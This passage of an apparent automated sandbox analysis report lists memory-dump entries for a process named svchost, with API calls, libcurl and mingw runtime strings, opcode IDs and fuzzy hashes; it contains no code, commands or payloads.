                                                                                                                                                                                • Associated: 0000001C.00000002.3268266212.00000000682A1000.00000004.00000001.01000000.00000011.sdmpDownload File
                                                                                                                                                                                • Associated: 0000001C.00000002.3268300166.00000000682A4000.00000008.00000001.01000000.00000011.sdmpDownload File
                                                                                                                                                                                • Associated: 0000001C.00000002.3268321447.00000000682A5000.00000002.00000001.01000000.00000011.sdmpDownload File
                                                                                                                                                                                • Associated: 0000001C.00000002.3268321447.00000000682EC000.00000002.00000001.01000000.00000011.sdmpDownload File
                                                                                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                                                                                • Snapshot File: hcaresult_28_2_68280000_svchost.jbxd
                                                                                                                                                                                Similarity
                                                                                                                                                                                • API ID: setlocalestrchrstrcmpstrlenstrrchr
                                                                                                                                                                                • String ID: ASCII$CP%s$CP%u$CP936
                                                                                                                                                                                • API String ID: 2840338844-1692024362
                                                                                                                                                                                • Opcode ID: 182277ec904048f4833963a75aa617e9bd8b241e25b6d7fc156e65e334356766
                                                                                                                                                                                • Instruction ID: c7600fd9c23a00d7e0e9bebd6c13a976c1e8ce6dfdd5acbcd16871e33a0f6ef2
                                                                                                                                                                                • Opcode Fuzzy Hash: 182277ec904048f4833963a75aa617e9bd8b241e25b6d7fc156e65e334356766
                                                                                                                                                                                • Instruction Fuzzy Hash: D62104A630568E94EF188F27E9143A523A2AB45B88FCC8535CD2F07394EF2DC458C710
                                                                                                                                                                                APIs
                                                                                                                                                                                Strings
                                                                                                                                                                                Memory Dump Source
                                                                                                                                                                                • Source File: 0000001C.00000002.3270133340.00007FF8B8361000.00000020.00000001.01000000.0000000C.sdmp, Offset: 00007FF8B8360000, based on PE: true
                                                                                                                                                                                • Associated: 0000001C.00000002.3270115410.00007FF8B8360000.00000002.00000001.01000000.0000000C.sdmpDownload File
                                                                                                                                                                                • Associated: 0000001C.00000002.3270172050.00007FF8B83CB000.00000002.00000001.01000000.0000000C.sdmpDownload File
                                                                                                                                                                                • Associated: 0000001C.00000002.3270194651.00007FF8B83E7000.00000004.00000001.01000000.0000000C.sdmpDownload File
                                                                                                                                                                                • Associated: 0000001C.00000002.3270212811.00007FF8B83E8000.00000008.00000001.01000000.0000000C.sdmpDownload File
                                                                                                                                                                                • Associated: 0000001C.00000002.3270230413.00007FF8B83E9000.00000004.00000001.01000000.0000000C.sdmpDownload File
                                                                                                                                                                                • Associated: 0000001C.00000002.3270248168.00007FF8B83EB000.00000002.00000001.01000000.0000000C.sdmpDownload File
                                                                                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                                                                                • Snapshot File: hcaresult_28_2_7ff8b8360000_svchost.jbxd
                                                                                                                                                                                Similarity
                                                                                                                                                                                • API ID: free$mallocmemmovememset
                                                                                                                                                                                • String ID: Client ID length mismatched: [%zu]$Password is too large: [%zu]$Username is too large: [%zu]$Using client id '%s'$curl
                                                                                                                                                                                • API String ID: 443121736-613767030
                                                                                                                                                                                • Opcode ID: e6b1a77262f2262a197570518129888e3dc1a34fb133a5694887328c97763e31
                                                                                                                                                                                • Instruction ID: 581c899a60592efe08cb49b654ef439b30900e776491d5dc2133d8811761683b
                                                                                                                                                                                • Opcode Fuzzy Hash: e6b1a77262f2262a197570518129888e3dc1a34fb133a5694887328c97763e31
                                                                                                                                                                                • Instruction Fuzzy Hash: BE9121A2A097C685EB50DB09E4406BA7BA4FB49BC4F498135EF4E07391EF3CD486C708
                                                                                                                                                                                APIs
                                                                                                                                                                                • free.API-MS-WIN-CRT-HEAP-L1-1-0 ref: 00007FF8B8388321
                                                                                                                                                                                • free.API-MS-WIN-CRT-HEAP-L1-1-0 ref: 00007FF8B8388333
                                                                                                                                                                                  • Part of subcall function 00007FF8B83AFB40: _errno.API-MS-WIN-CRT-RUNTIME-L1-1-0 ref: 00007FF8B83AFB6A
                                                                                                                                                                                  • Part of subcall function 00007FF8B83AFB40: strtoll.API-MS-WIN-CRT-CONVERT-L1-1-0 ref: 00007FF8B83AFBC9
                                                                                                                                                                                  • Part of subcall function 00007FF8B83AFB40: _errno.API-MS-WIN-CRT-RUNTIME-L1-1-0 ref: 00007FF8B83AFBDF
                                                                                                                                                                                Strings
                                                                                                                                                                                Memory Dump Source
                                                                                                                                                                                • Source File: 0000001C.00000002.3270133340.00007FF8B8361000.00000020.00000001.01000000.0000000C.sdmp, Offset: 00007FF8B8360000, based on PE: true
                                                                                                                                                                                • Associated: 0000001C.00000002.3270115410.00007FF8B8360000.00000002.00000001.01000000.0000000C.sdmpDownload File
                                                                                                                                                                                • Associated: 0000001C.00000002.3270172050.00007FF8B83CB000.00000002.00000001.01000000.0000000C.sdmpDownload File
                                                                                                                                                                                • Associated: 0000001C.00000002.3270194651.00007FF8B83E7000.00000004.00000001.01000000.0000000C.sdmpDownload File
                                                                                                                                                                                • Associated: 0000001C.00000002.3270212811.00007FF8B83E8000.00000008.00000001.01000000.0000000C.sdmpDownload File
                                                                                                                                                                                • Associated: 0000001C.00000002.3270230413.00007FF8B83E9000.00000004.00000001.01000000.0000000C.sdmpDownload File
                                                                                                                                                                                • Associated: 0000001C.00000002.3270248168.00007FF8B83EB000.00000002.00000001.01000000.0000000C.sdmpDownload File
                                                                                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                                                                                • Snapshot File: hcaresult_28_2_7ff8b8360000_svchost.jbxd
                                                                                                                                                                                Similarity
                                                                                                                                                                                • API ID: _errnofree$strtoll
                                                                                                                                                                                • String ID: Connection:$Content-Encoding:$Content-Length:$Content-Range:$Content-Type:$HTTP/1.0 connection set to keep alive$Invalid Content-Length: value$Maximum file size exceeded$Overflow Content-Length: value$close$keep-alive
                                                                                                                                                                                • API String ID: 3276018995-3388171939
                                                                                                                                                                                • Opcode ID: e382dc34c5439bdb5d4f542888e95cc8e8c35aa73c59b592f7b15568aa21ebd6
                                                                                                                                                                                • Instruction ID: d9b7b3403e471995b3ca83237d151bc16583b093aa753c0c6e1009bd32fc466e
                                                                                                                                                                                • Opcode Fuzzy Hash: e382dc34c5439bdb5d4f542888e95cc8e8c35aa73c59b592f7b15568aa21ebd6
                                                                                                                                                                                • Instruction Fuzzy Hash: 6F917A25E2DA8286FB609B2D99103B92791AF4EBC4F4C4032CB4D472D7DF6CE5478719
                                                                                                                                                                                APIs
                                                                                                                                                                                Strings
                                                                                                                                                                                Memory Dump Source
                                                                                                                                                                                • Source File: 0000001C.00000002.3270133340.00007FF8B8361000.00000020.00000001.01000000.0000000C.sdmp, Offset: 00007FF8B8360000, based on PE: true
                                                                                                                                                                                • Associated: 0000001C.00000002.3270115410.00007FF8B8360000.00000002.00000001.01000000.0000000C.sdmpDownload File
                                                                                                                                                                                • Associated: 0000001C.00000002.3270172050.00007FF8B83CB000.00000002.00000001.01000000.0000000C.sdmpDownload File
                                                                                                                                                                                • Associated: 0000001C.00000002.3270194651.00007FF8B83E7000.00000004.00000001.01000000.0000000C.sdmpDownload File
                                                                                                                                                                                • Associated: 0000001C.00000002.3270212811.00007FF8B83E8000.00000008.00000001.01000000.0000000C.sdmpDownload File
                                                                                                                                                                                • Associated: 0000001C.00000002.3270230413.00007FF8B83E9000.00000004.00000001.01000000.0000000C.sdmpDownload File
                                                                                                                                                                                • Associated: 0000001C.00000002.3270248168.00007FF8B83EB000.00000002.00000001.01000000.0000000C.sdmpDownload File
                                                                                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                                                                                • Snapshot File: hcaresult_28_2_7ff8b8360000_svchost.jbxd
                                                                                                                                                                                Similarity
                                                                                                                                                                                • API ID: ErrorLast
                                                                                                                                                                                • String ID: *$???$FTP response aborted due to select/poll error: %d$FTP response timeout$QUOT string not accepted: %s$STOP$We got a 421 - timeout$[%s] -> [%s]$getFTPResponse -> result=%d, nread=%zd, ftpcode=%d$getFTPResponse start
                                                                                                                                                                                • API String ID: 1452528299-1133872225
                                                                                                                                                                                • Opcode ID: db1c5fb0b3197ef6521e3081ba7be42461b8e8fe4d205f2fb762517937984caf
                                                                                                                                                                                • Instruction ID: 1143ae65758720c8f145f4de6d22fdca62b8e3df461b267184098e76682a7ac8
                                                                                                                                                                                • Opcode Fuzzy Hash: db1c5fb0b3197ef6521e3081ba7be42461b8e8fe4d205f2fb762517937984caf
                                                                                                                                                                                • Instruction Fuzzy Hash: BB819125A09B8281FAA09B1DE8406BA6B91AF8D7D8F4C5131DF4E07799DF3CF4478708
                                                                                                                                                                                APIs
                                                                                                                                                                                • pthread_rwlock_rdlock.LIBWINPTHREAD-1 ref: 68281966
                                                                                                                                                                                • strlen.MSVCRT ref: 68281977
                                                                                                                                                                                  • Part of subcall function 68283500: strlen.MSVCRT ref: 68283575
                                                                                                                                                                                  • Part of subcall function 68283500: strlen.MSVCRT ref: 68283598
                                                                                                                                                                                  • Part of subcall function 68283500: strlen.MSVCRT ref: 682835BA
                                                                                                                                                                                  • Part of subcall function 68283500: strlen.MSVCRT ref: 682835DB
                                                                                                                                                                                  • Part of subcall function 68283500: strlen.MSVCRT ref: 682835F7
                                                                                                                                                                                  • Part of subcall function 68283500: strlen.MSVCRT ref: 68283603
                                                                                                                                                                                  • Part of subcall function 68283500: malloc.MSVCRT ref: 68283612
                                                                                                                                                                                • pthread_rwlock_unlock.LIBWINPTHREAD-1 ref: 682819D9
                                                                                                                                                                                • _strdup.MSVCRT ref: 68281A73
                                                                                                                                                                                • pthread_rwlock_wrlock.LIBWINPTHREAD-1 ref: 68281AC8
                                                                                                                                                                                • strlen.MSVCRT ref: 68281AD9
                                                                                                                                                                                • pthread_rwlock_unlock.LIBWINPTHREAD-1 ref: 68281B43
                                                                                                                                                                                • free.MSVCRT ref: 68281B64
                                                                                                                                                                                • free.MSVCRT ref: 68281B7B
                                                                                                                                                                                • abort.MSVCRT(?,?,?,?,?,?,?,?,?,?,?,?,POSIX,?,?,6829FC06), ref: 68281BC8
                                                                                                                                                                                Strings
                                                                                                                                                                                Memory Dump Source
                                                                                                                                                                                • Source File: 0000001C.00000002.3268094549.0000000068281000.00000020.00000001.01000000.00000011.sdmp, Offset: 68280000, based on PE: true
                                                                                                                                                                                • Associated: 0000001C.00000002.3268053288.0000000068280000.00000002.00000001.01000000.00000011.sdmpDownload File
                                                                                                                                                                                • Associated: 0000001C.00000002.3268141358.0000000068296000.00000004.00000001.01000000.00000011.sdmpDownload File
                                                                                                                                                                                • Associated: 0000001C.00000002.3268183612.0000000068297000.00000002.00000001.01000000.00000011.sdmpDownload File
                                                                                                                                                                                • Associated: 0000001C.00000002.3268226843.00000000682A0000.00000002.00000001.01000000.00000011.sdmpDownload File
                                                                                                                                                                                • Associated: 0000001C.00000002.3268266212.00000000682A1000.00000004.00000001.01000000.00000011.sdmpDownload File
                                                                                                                                                                                • Associated: 0000001C.00000002.3268300166.00000000682A4000.00000008.00000001.01000000.00000011.sdmpDownload File
                                                                                                                                                                                • Associated: 0000001C.00000002.3268321447.00000000682A5000.00000002.00000001.01000000.00000011.sdmpDownload File
                                                                                                                                                                                • Associated: 0000001C.00000002.3268321447.00000000682EC000.00000002.00000001.01000000.00000011.sdmpDownload File
                                                                                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                                                                                • Snapshot File: hcaresult_28_2_68280000_svchost.jbxd
                                                                                                                                                                                Similarity
                                                                                                                                                                                • API ID: strlen$freepthread_rwlock_unlock$_strdupabortmallocpthread_rwlock_rdlockpthread_rwlock_wrlock
                                                                                                                                                                                • String ID: POSIX
                                                                                                                                                                                • API String ID: 2621910772-397921758
                                                                                                                                                                                • Opcode ID: 8b4f2b39b8d97997c3be6eff95473a80323d59d398344c685dff2fea4de45433
                                                                                                                                                                                • Instruction ID: aa5b84106ae72cb9e6c5de2ac422163aa92ff2da87194c78adeb97b4ad97f57b
                                                                                                                                                                                • Opcode Fuzzy Hash: 8b4f2b39b8d97997c3be6eff95473a80323d59d398344c685dff2fea4de45433
                                                                                                                                                                                • Instruction Fuzzy Hash: F3517EB6305A4985EF24CB16E85476AB3A4FB85BC5FC48225DEB947BD4EF38C089C700
                                                                                                                                                                                APIs
                                                                                                                                                                                • __iob_func.MSVCRT ref: 6828CB32
                                                                                                                                                                                • fwrite.MSVCRT ref: 6828CB4D
                                                                                                                                                                                • __iob_func.MSVCRT ref: 6828CB57
                                                                                                                                                                                • vfprintf.MSVCRT ref: 6828CB66
                                                                                                                                                                                • abort.MSVCRT(?,?,?,?,-6829EEC8,00000000,6828CCB3,?,?,?,?,6829BD28,?,?,?,6829BD30), ref: 6828CB6B
                                                                                                                                                                                • VirtualQuery.KERNEL32 ref: 6828CC34
                                                                                                                                                                                • VirtualProtect.KERNEL32 ref: 6828CC6D
                                                                                                                                                                                Strings
                                                                                                                                                                                • VirtualQuery failed for %d bytes at address %p, xrefs: 6828CCBA
                                                                                                                                                                                • Address %p has no image-section, xrefs: 6828CCD0
                                                                                                                                                                                • VirtualProtect failed with code 0x%x, xrefs: 6828CB87
                                                                                                                                                                                • Mingw-w64 runtime failure:, xrefs: 6828CB46
                                                                                                                                                                                Memory Dump Source
                                                                                                                                                                                • Source File: 0000001C.00000002.3268094549.0000000068281000.00000020.00000001.01000000.00000011.sdmp, Offset: 68280000, based on PE: true
                                                                                                                                                                                • Associated: 0000001C.00000002.3268053288.0000000068280000.00000002.00000001.01000000.00000011.sdmpDownload File
                                                                                                                                                                                • Associated: 0000001C.00000002.3268141358.0000000068296000.00000004.00000001.01000000.00000011.sdmpDownload File
                                                                                                                                                                                • Associated: 0000001C.00000002.3268183612.0000000068297000.00000002.00000001.01000000.00000011.sdmpDownload File
                                                                                                                                                                                • Associated: 0000001C.00000002.3268226843.00000000682A0000.00000002.00000001.01000000.00000011.sdmpDownload File
                                                                                                                                                                                • Associated: 0000001C.00000002.3268266212.00000000682A1000.00000004.00000001.01000000.00000011.sdmpDownload File
                                                                                                                                                                                • Associated: 0000001C.00000002.3268300166.00000000682A4000.00000008.00000001.01000000.00000011.sdmpDownload File
                                                                                                                                                                                • Associated: 0000001C.00000002.3268321447.00000000682A5000.00000002.00000001.01000000.00000011.sdmpDownload File
                                                                                                                                                                                • Associated: 0000001C.00000002.3268321447.00000000682EC000.00000002.00000001.01000000.00000011.sdmpDownload File
                                                                                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                                                                                • Snapshot File: hcaresult_28_2_68280000_svchost.jbxd
                                                                                                                                                                                Similarity
                                                                                                                                                                                • API ID: Virtual__iob_func$ProtectQueryabortfwritevfprintf
                                                                                                                                                                                • String ID: VirtualProtect failed with code 0x%x$ VirtualQuery failed for %d bytes at address %p$Address %p has no image-section$Mingw-w64 runtime failure:
                                                                                                                                                                                • API String ID: 1881255093-1534286854
                                                                                                                                                                                • Opcode ID: c24426f30a81dc719dd406bbf4a38ff7ef1f9f8a5e2f5ac05230e05b40409870
                                                                                                                                                                                • Instruction ID: f22fc2a1fa6d236086a060e7337463cc3dd8d1a524d64f12b052bda150fc559e
                                                                                                                                                                                • Opcode Fuzzy Hash: c24426f30a81dc719dd406bbf4a38ff7ef1f9f8a5e2f5ac05230e05b40409870
                                                                                                                                                                                • Instruction Fuzzy Hash: 7F41F0B7701A4996EF11CB06E840B9A7721FB45BE8FC88225DE5C073A4DF78C54AC740
                                                                                                                                                                                APIs
                                                                                                                                                                                Strings
                                                                                                                                                                                Memory Dump Source
                                                                                                                                                                                • Source File: 0000001C.00000002.3270133340.00007FF8B8361000.00000020.00000001.01000000.0000000C.sdmp, Offset: 00007FF8B8360000, based on PE: true
                                                                                                                                                                                • Associated: 0000001C.00000002.3270115410.00007FF8B8360000.00000002.00000001.01000000.0000000C.sdmpDownload File
                                                                                                                                                                                • Associated: 0000001C.00000002.3270172050.00007FF8B83CB000.00000002.00000001.01000000.0000000C.sdmpDownload File
                                                                                                                                                                                • Associated: 0000001C.00000002.3270194651.00007FF8B83E7000.00000004.00000001.01000000.0000000C.sdmpDownload File
                                                                                                                                                                                • Associated: 0000001C.00000002.3270212811.00007FF8B83E8000.00000008.00000001.01000000.0000000C.sdmpDownload File
                                                                                                                                                                                • Associated: 0000001C.00000002.3270230413.00007FF8B83E9000.00000004.00000001.01000000.0000000C.sdmpDownload File
                                                                                                                                                                                • Associated: 0000001C.00000002.3270248168.00007FF8B83EB000.00000002.00000001.01000000.0000000C.sdmpDownload File
                                                                                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                                                                                • Snapshot File: hcaresult_28_2_7ff8b8360000_svchost.jbxd
                                                                                                                                                                                Similarity
                                                                                                                                                                                • API ID: ErrorLast_errno$strrchr$__sys_errlist__sys_nerr
                                                                                                                                                                                • String ID: Unknown error %d (%#x)
                                                                                                                                                                                • API String ID: 3904614065-2414550090
                                                                                                                                                                                • Opcode ID: a6f0c3ef7fcbbaf6cecf0560bc82e43310d480c243785e2f9173b75063d91510
                                                                                                                                                                                • Instruction ID: a1e7ba82aa0bd7950b15a657a1d87154e5f4ce9bca1a7ee6cc1a0e2a4fb59c24
                                                                                                                                                                                • Opcode Fuzzy Hash: a6f0c3ef7fcbbaf6cecf0560bc82e43310d480c243785e2f9173b75063d91510
                                                                                                                                                                                • Instruction Fuzzy Hash: 8E316721A08B8685EA145F6AA81427E73A1BF8CBC5F4C4031DF0E47795DF7DA8478B08
                                                                                                                                                                                APIs
                                                                                                                                                                                Strings
                                                                                                                                                                                Memory Dump Source
                                                                                                                                                                                • Source File: 0000001C.00000002.3270133340.00007FF8B8361000.00000020.00000001.01000000.0000000C.sdmp, Offset: 00007FF8B8360000, based on PE: true
                                                                                                                                                                                • Associated: 0000001C.00000002.3270115410.00007FF8B8360000.00000002.00000001.01000000.0000000C.sdmpDownload File
                                                                                                                                                                                • Associated: 0000001C.00000002.3270172050.00007FF8B83CB000.00000002.00000001.01000000.0000000C.sdmpDownload File
                                                                                                                                                                                • Associated: 0000001C.00000002.3270194651.00007FF8B83E7000.00000004.00000001.01000000.0000000C.sdmpDownload File
                                                                                                                                                                                • Associated: 0000001C.00000002.3270212811.00007FF8B83E8000.00000008.00000001.01000000.0000000C.sdmpDownload File
                                                                                                                                                                                • Associated: 0000001C.00000002.3270230413.00007FF8B83E9000.00000004.00000001.01000000.0000000C.sdmpDownload File
                                                                                                                                                                                • Associated: 0000001C.00000002.3270248168.00007FF8B83EB000.00000002.00000001.01000000.0000000C.sdmpDownload File
                                                                                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                                                                                • Snapshot File: hcaresult_28_2_7ff8b8360000_svchost.jbxd
                                                                                                                                                                                Similarity
                                                                                                                                                                                • API ID: free$malloc
                                                                                                                                                                                • String ID: ;$;$MAILINDEX$PARTIAL$SECTION$UID$UIDVALIDITY
                                                                                                                                                                                • API String ID: 2190258309-539558009
                                                                                                                                                                                • Opcode ID: 891ff58188696345f6ecd252e1ffea6e115dcda5e51354b30121dafd71db9c87
                                                                                                                                                                                • Instruction ID: 207475a54125f20bc3f7560a1c5d8cf77b0cbb767c101e156cf91675d8a33b81
                                                                                                                                                                                • Opcode Fuzzy Hash: 891ff58188696345f6ecd252e1ffea6e115dcda5e51354b30121dafd71db9c87
                                                                                                                                                                                • Instruction Fuzzy Hash: EFA16722609A8285EB559F29D4502B82BA0FF4DBD8F5C0031EB4E47A86DF3EE593C754
                                                                                                                                                                                APIs
                                                                                                                                                                                Memory Dump Source
                                                                                                                                                                                • Source File: 0000001C.00000002.3268094549.0000000068281000.00000020.00000001.01000000.00000011.sdmp, Offset: 68280000, based on PE: true
                                                                                                                                                                                • Associated: 0000001C.00000002.3268053288.0000000068280000.00000002.00000001.01000000.00000011.sdmpDownload File
                                                                                                                                                                                • Associated: 0000001C.00000002.3268141358.0000000068296000.00000004.00000001.01000000.00000011.sdmpDownload File
                                                                                                                                                                                • Associated: 0000001C.00000002.3268183612.0000000068297000.00000002.00000001.01000000.00000011.sdmpDownload File
                                                                                                                                                                                • Associated: 0000001C.00000002.3268226843.00000000682A0000.00000002.00000001.01000000.00000011.sdmpDownload File
                                                                                                                                                                                • Associated: 0000001C.00000002.3268266212.00000000682A1000.00000004.00000001.01000000.00000011.sdmpDownload File
                                                                                                                                                                                • Associated: 0000001C.00000002.3268300166.00000000682A4000.00000008.00000001.01000000.00000011.sdmpDownload File
                                                                                                                                                                                • Associated: 0000001C.00000002.3268321447.00000000682A5000.00000002.00000001.01000000.00000011.sdmpDownload File
                                                                                                                                                                                • Associated: 0000001C.00000002.3268321447.00000000682EC000.00000002.00000001.01000000.00000011.sdmpDownload File
                                                                                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                                                                                • Snapshot File: hcaresult_28_2_68280000_svchost.jbxd
                                                                                                                                                                                Similarity
                                                                                                                                                                                • API ID: realloc
                                                                                                                                                                                • String ID:
                                                                                                                                                                                • API String ID: 471065373-0
                                                                                                                                                                                • Opcode ID: 1bd1ad42625a25576ddee770d907f277b401a28359c31fbf83a96b83cbae493f
                                                                                                                                                                                • Instruction ID: 8ecf840fec1bc17a237b0d567b5a045c17d8e3f7fdeb30295c86988d4f35b1c4
                                                                                                                                                                                • Opcode Fuzzy Hash: 1bd1ad42625a25576ddee770d907f277b401a28359c31fbf83a96b83cbae493f
                                                                                                                                                                                • Instruction Fuzzy Hash: 1C7160B7A01B8D89DF108FAAD45029C23B1F748B98F814A26DE7E67BD8DF34C1958351
                                                                                                                                                                                APIs
                                                                                                                                                                                Memory Dump Source
                                                                                                                                                                                • Source File: 0000001C.00000002.3268094549.0000000068281000.00000020.00000001.01000000.00000011.sdmp, Offset: 68280000, based on PE: true
                                                                                                                                                                                • Associated: 0000001C.00000002.3268053288.0000000068280000.00000002.00000001.01000000.00000011.sdmpDownload File
                                                                                                                                                                                • Associated: 0000001C.00000002.3268141358.0000000068296000.00000004.00000001.01000000.00000011.sdmpDownload File
                                                                                                                                                                                • Associated: 0000001C.00000002.3268183612.0000000068297000.00000002.00000001.01000000.00000011.sdmpDownload File
                                                                                                                                                                                • Associated: 0000001C.00000002.3268226843.00000000682A0000.00000002.00000001.01000000.00000011.sdmpDownload File
                                                                                                                                                                                • Associated: 0000001C.00000002.3268266212.00000000682A1000.00000004.00000001.01000000.00000011.sdmpDownload File
                                                                                                                                                                                • Associated: 0000001C.00000002.3268300166.00000000682A4000.00000008.00000001.01000000.00000011.sdmpDownload File
                                                                                                                                                                                • Associated: 0000001C.00000002.3268321447.00000000682A5000.00000002.00000001.01000000.00000011.sdmpDownload File
                                                                                                                                                                                • Associated: 0000001C.00000002.3268321447.00000000682EC000.00000002.00000001.01000000.00000011.sdmpDownload File
                                                                                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                                                                                • Snapshot File: hcaresult_28_2_68280000_svchost.jbxd
                                                                                                                                                                                Similarity
                                                                                                                                                                                • API ID: realloc
                                                                                                                                                                                • String ID:
                                                                                                                                                                                • API String ID: 471065373-0
                                                                                                                                                                                • Opcode ID: 11b7b08736c4f8117144c861494a02a9ef74d149421bf4938aa5eb4cba4632e3
                                                                                                                                                                                • Instruction ID: 528f39e42b5b6977e26e296ae7cbd605010632a836425bc1d869b01b97b6dd91
                                                                                                                                                                                • Opcode Fuzzy Hash: 11b7b08736c4f8117144c861494a02a9ef74d149421bf4938aa5eb4cba4632e3
                                                                                                                                                                                • Instruction Fuzzy Hash: 91714BB6601A8C8ADF10CFAAD4506AC37A1F748B98B814A16DE6D57B98DF34C195C350
                                                                                                                                                                                APIs
                                                                                                                                                                                Memory Dump Source
                                                                                                                                                                                • Source File: 0000001C.00000002.3270133340.00007FF8B8361000.00000020.00000001.01000000.0000000C.sdmp, Offset: 00007FF8B8360000, based on PE: true
                                                                                                                                                                                • Associated: 0000001C.00000002.3270115410.00007FF8B8360000.00000002.00000001.01000000.0000000C.sdmpDownload File
                                                                                                                                                                                • Associated: 0000001C.00000002.3270172050.00007FF8B83CB000.00000002.00000001.01000000.0000000C.sdmpDownload File
                                                                                                                                                                                • Associated: 0000001C.00000002.3270194651.00007FF8B83E7000.00000004.00000001.01000000.0000000C.sdmpDownload File
                                                                                                                                                                                • Associated: 0000001C.00000002.3270212811.00007FF8B83E8000.00000008.00000001.01000000.0000000C.sdmpDownload File
                                                                                                                                                                                • Associated: 0000001C.00000002.3270230413.00007FF8B83E9000.00000004.00000001.01000000.0000000C.sdmpDownload File
                                                                                                                                                                                • Associated: 0000001C.00000002.3270248168.00007FF8B83EB000.00000002.00000001.01000000.0000000C.sdmpDownload File
                                                                                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                                                                                • Snapshot File: hcaresult_28_2_7ff8b8360000_svchost.jbxd
                                                                                                                                                                                Similarity
                                                                                                                                                                                • API ID: _strdup$callocfree
                                                                                                                                                                                • String ID:
                                                                                                                                                                                • API String ID: 1183638330-0
                                                                                                                                                                                • Opcode ID: 8968a9b29ea3bed6dc44da5c58367346598206cc7a3a902676288e881c707bbc
                                                                                                                                                                                • Instruction ID: c405abc0f7f9e12be87e360dba5e18b75fedc75170f16f390877a377786ad4c3
                                                                                                                                                                                • Opcode Fuzzy Hash: 8968a9b29ea3bed6dc44da5c58367346598206cc7a3a902676288e881c707bbc
                                                                                                                                                                                • Instruction Fuzzy Hash: BF41E965A0BF429AEE598F6D906013833A0EF4CB96F0C0434DF5E46B54EF2CE466C368
                                                                                                                                                                                APIs
                                                                                                                                                                                Strings
                                                                                                                                                                                Memory Dump Source
                                                                                                                                                                                • Source File: 0000001C.00000002.3270133340.00007FF8B8361000.00000020.00000001.01000000.0000000C.sdmp, Offset: 00007FF8B8360000, based on PE: true
                                                                                                                                                                                • Associated: 0000001C.00000002.3270115410.00007FF8B8360000.00000002.00000001.01000000.0000000C.sdmpDownload File
                                                                                                                                                                                • Associated: 0000001C.00000002.3270172050.00007FF8B83CB000.00000002.00000001.01000000.0000000C.sdmpDownload File
                                                                                                                                                                                • Associated: 0000001C.00000002.3270194651.00007FF8B83E7000.00000004.00000001.01000000.0000000C.sdmpDownload File
                                                                                                                                                                                • Associated: 0000001C.00000002.3270212811.00007FF8B83E8000.00000008.00000001.01000000.0000000C.sdmpDownload File
                                                                                                                                                                                • Associated: 0000001C.00000002.3270230413.00007FF8B83E9000.00000004.00000001.01000000.0000000C.sdmpDownload File
                                                                                                                                                                                • Associated: 0000001C.00000002.3270248168.00007FF8B83EB000.00000002.00000001.01000000.0000000C.sdmpDownload File
                                                                                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                                                                                • Snapshot File: hcaresult_28_2_7ff8b8360000_svchost.jbxd
                                                                                                                                                                                Similarity
                                                                                                                                                                                • API ID: _unlinkfclosefputsfree
                                                                                                                                                                                • String ID: # Your HSTS cache. https://curl.se/docs/hsts.html# This file was generated by libcurl! Edit at your own risk.$%d%02d%02d %02d:%02d:%02d$%s%s "%d%02d%02d %02d:%02d:%02d"$%s%s "%s"$unlimited
                                                                                                                                                                                • API String ID: 820369455-2451391588
                                                                                                                                                                                • Opcode ID: 4823ce3b5c4b549546bc7f31d7a0746d127fa6ca01248e7f2081cbed53ef29f7
                                                                                                                                                                                • Instruction ID: bdc7aed137d5ee5095b719bb245f93920d9dc0e1cfa9063cf71fe2e29cdf3a7a
                                                                                                                                                                                • Opcode Fuzzy Hash: 4823ce3b5c4b549546bc7f31d7a0746d127fa6ca01248e7f2081cbed53ef29f7
                                                                                                                                                                                • Instruction Fuzzy Hash: B9A14062B096428AEB61DB69D4403AD73A1FB4C7E8F080236DF5D57B89EF3CD4468B04
                                                                                                                                                                                APIs
                                                                                                                                                                                Strings
                                                                                                                                                                                Memory Dump Source
                                                                                                                                                                                • Source File: 0000001C.00000002.3270133340.00007FF8B8361000.00000020.00000001.01000000.0000000C.sdmp, Offset: 00007FF8B8360000, based on PE: true
                                                                                                                                                                                • Associated: 0000001C.00000002.3270115410.00007FF8B8360000.00000002.00000001.01000000.0000000C.sdmpDownload File
                                                                                                                                                                                • Associated: 0000001C.00000002.3270172050.00007FF8B83CB000.00000002.00000001.01000000.0000000C.sdmpDownload File
                                                                                                                                                                                • Associated: 0000001C.00000002.3270194651.00007FF8B83E7000.00000004.00000001.01000000.0000000C.sdmpDownload File
                                                                                                                                                                                • Associated: 0000001C.00000002.3270212811.00007FF8B83E8000.00000008.00000001.01000000.0000000C.sdmpDownload File
                                                                                                                                                                                • Associated: 0000001C.00000002.3270230413.00007FF8B83E9000.00000004.00000001.01000000.0000000C.sdmpDownload File
                                                                                                                                                                                • Associated: 0000001C.00000002.3270248168.00007FF8B83EB000.00000002.00000001.01000000.0000000C.sdmpDownload File
                                                                                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                                                                                • Snapshot File: hcaresult_28_2_7ff8b8360000_svchost.jbxd
                                                                                                                                                                                Similarity
                                                                                                                                                                                • API ID: free$_strdupstrchrstrtol
                                                                                                                                                                                • String ID: %s%s%s$Alt-svc connecting from [%s]%s:%d to [%s]%s:%d$Connecting to hostname: %s$Connecting to port: %d$anonymous
                                                                                                                                                                                • API String ID: 3112833881-699241891
                                                                                                                                                                                • Opcode ID: f773682d90f0d8591cd69121bc65c661f6af6b2e813267a192b554e53bfc899e
                                                                                                                                                                                • Instruction ID: ebb87fdc44e4e0b97fe85da78dc3df5e2cabd5491196aceaab7e3db2a3758e22
                                                                                                                                                                                • Opcode Fuzzy Hash: f773682d90f0d8591cd69121bc65c661f6af6b2e813267a192b554e53bfc899e
                                                                                                                                                                                • Instruction Fuzzy Hash: FAA1B16260DB818AEB658B29E4403AA7BA0FB4ABC4F584135DF9D47781DF3CE446C708
                                                                                                                                                                                APIs
                                                                                                                                                                                Strings
                                                                                                                                                                                Memory Dump Source
                                                                                                                                                                                • Source File: 0000001C.00000002.3270133340.00007FF8B8361000.00000020.00000001.01000000.0000000C.sdmp, Offset: 00007FF8B8360000, based on PE: true
